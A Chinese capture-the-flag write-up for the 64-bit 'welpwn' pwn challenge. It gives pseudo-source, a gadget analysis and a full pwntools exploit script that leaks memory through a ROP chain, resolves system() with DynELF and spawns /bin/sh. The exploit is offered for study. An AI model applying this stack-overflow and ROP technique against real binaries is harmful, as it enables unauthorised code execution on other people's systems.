五_3.泄露libc_CTF_2015-welpwn_64

伪源码
{
  char buf; // [sp+0h] [bp-400h]@1   (0x400-byte stack buffer; the read() below never writes past it)

  alarm(0xAu);                               // 10 s watchdog, re-armed every time main is entered
  write(1, "Welcome to RCTF\n", 0x10uLL);    // 16-byte banner, printed on every (re)start of main
  fflush(_bss_start);
  read(0, &buf, 0x400uLL);                   // attacker input, at most 0x400 bytes, no NUL appended
  echo(&buf, &buf);                          // body not shown; the exp's 24-byte padding suggests the overflow lives in here, not in main
  return 0;
}

学过 DynELF 就不怕出题人不给 libc：只要像下面 leak() 那样构造一个任意地址读的泄露原语，DynELF 就能在没有 libc 文件的情况下，直接从目标进程内存里解析出 system 的地址。

仔细分析

1. 64 位下前几个参数通过 rdi、rsi、rdx 等寄存器传递，不能像 32 位那样直接把参数摆在栈上，必须借助 gadget 把栈上的值装进寄存器。
2. gadget 片段的选取：本题用的是 0x40089a（pop rbx/rbp/r12~r15; ret）和 0x400880（mov rdx,r13; mov rsi,r14; mov edi,r15d; call [r12+rbx*8]）这一对通用 gadget（应为 __libc_csu_init 尾部，需用 objdump/ROPgadget 核对），配合 0x40089c（同一串 pop 的后 4 个）跳过 echo 返回地址前的 32 字节，0x4008a3（pop rdi; ret）给 system 传参。
3. IDA 在 main 里看不出溢出是正常的：buf 位于 bp-0x400，read 最多只读 0x400 字节，main 本身并不溢出；溢出点应在 echo 里（exp 用 24 字节填充就覆盖到了返回地址，说明 echo 的局部缓冲区加 saved rbp 只有 24 字节），需要进入 echo 查看确认。
4.echo:http://www.zsythink.net/archives/96/

EXP(后期补写脚本历程)
#!/usr/bin/python
#coding:utf-8
from  pwn import*

p = process('./welpwn')
elf = ELF("welpwn")

# Addresses of the non-PIE binary.  PLT/GOT slots come from the ELF; the
# gadget addresses were located by hand (verify with objdump/ROPgadget).
write_addr = elf.plt['write']
write_got_addr = elf.got['write']
read_addr = elf.plt['read']
read_got_addr = elf.got['read']

start_addr = 0x400630          # presumably _start: re-enters main for another round of input
pop_gadget1 = 0x40089a         # used as: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
mov_gadget2 = 0x400880         # used as: mov rdx,r13; mov rsi,r14; mov edi,r15d; call [r12+rbx*8]
pop4_addr = 0x40089c           # the last four pops of pop_gadget1: skips 32 bytes of stack, then ret
pop1_addr = 0x4008a3           # used as: pop rdi; ret
where_bin_sh_addr = 0x6010d0   # writable scratch slot (presumably .bss) that will hold "/bin/sh"

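def leak(addr):
    """Leak 8 bytes at ``addr`` via write(1, addr, 8), then restart main.

    This is the DynELF leak primitive.  Each call overflows echo()'s frame,
    runs a ROP chain that calls write through its GOT entry with
    (fd=1, buf=addr, count=8), and finally jumps to start_addr so the
    process prints its banner again and waits for the next payload.

    Returns the raw bytes read back from the process (normally exactly 8).
    If the target cannot read ``addr`` the write fails silently and the
    bytes returned are whatever the process printed next (the banner), so
    callers get garbage rather than an exception for unmapped addresses.
    """
    # Drain anything pending (the 16-byte banner from the previous round,
    # plus any leftovers) so the recv below only sees our leaked bytes.
    p.recv(timeout=0.1)

    chain = 'A' * 24               # fills echo()'s local buffer + saved rbp
    chain += p64(pop4_addr)        # echo's return address; its 4 pops skip the
                                   # 32 bytes (24 'A' + this qword) that sit
                                   # before the chain in main's buf
    chain += p64(pop_gadget1)      # pop rbx, rbp, r12, r13, r14, r15 ; ret
    chain += p64(0)                # rbx = 0  -> call [r12 + 0]
    chain += p64(1)                # rbp = 1  -> rbx+1 == rbp, loop exits after one call
    chain += p64(write_got_addr)   # r12 = &GOT[write]
    chain += p64(8)                # r13 -> rdx = count
    chain += p64(addr)             # r14 -> rsi = buf
    chain += p64(1)                # r15 -> edi = fd (stdout)
    chain += p64(mov_gadget2)      # performs write(1, addr, 8)
    # After the call the gadget does add rsp,8 and pops rbx,rbp,r12-r15
    # before its ret (standard __libc_csu_init tail -- confirm in the
    # disassembly): 7 * 8 = 56 bytes of filler.
    chain += 'A' * 56
    chain += p64(start_addr)       # restart the program for the next leak
    # read() takes at most 0x400 bytes; pad to exactly that so the whole
    # payload is consumed in one read and nothing is left in stdin.
    chain = chain.ljust(1024, 'B')
    # send(), not sendline(): a trailing '\n' would not fit in this read and
    # would be prepended to the next round's input.
    p.send(chain)

    # write() emitted exactly 8 bytes before the process restarted; take all
    # of them instead of discarding half, which halves the number of rounds
    # DynELF needs.
    content = p.recvn(8)
    print("%#x -> %s" % (addr, (content or '').encode('hex')))
    return content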
#gdb.attach(p)
# Resolve system() inside the mapped libc without having the library file:
# DynELF only needs leak() as an arbitrary-read primitive on the live process.
d = DynELF(leak, elf=elf)
system_addr = d.lookup("system", "libc")
log.info("system_addr = %#x" % system_addr)


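# Stage 2: read "/bin/sh" into a writable slot, then call system() on it.
payload = 'A' * 24
payload += p64(pop4_addr)            # echo's return address; skips the 32 bytes before the chain
payload += p64(pop_gadget1)          # pop rbx, rbp, r12, r13, r14, r15 ; ret
payload += p64(0)                    # rbx = 0
payload += p64(1)                    # rbp = 1 -> single call
payload += p64(read_got_addr)        # r12 = &GOT[read]
payload += p64(8)                    # r13 -> rdx = count
payload += p64(where_bin_sh_addr)    # r14 -> rsi = buf
payload += p64(0)                    # r15 -> edi = fd (stdin)
payload += p64(mov_gadget2)          # read(0, where_bin_sh_addr, 8)
payload += 'A' * 56                  # add rsp,8 + six pops before the gadget's ret

payload += p64(pop1_addr)            # pop rdi ; ret
payload += p64(where_bin_sh_addr)    # rdi = "/bin/sh"
payload += p64(system_addr)          # system(rdi); nothing useful to return to afterwards
payload = payload.ljust(1024, 'b')
# Must be send(), not sendline(): the payload already fills the 0x400-byte
# read() in main, so an extra '\n' would stay in stdin and be consumed by
# the read(0, where_bin_sh_addr, 8) in the chain, turning the string into
# "\n/bin/sh" (or just "\n" if the second send has not arrived yet).
p.send(payload)
# Exactly the 8 bytes that the ROP read() asks for, NUL-terminated.
p.send("/bin/sh\x00")
p.interactive()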
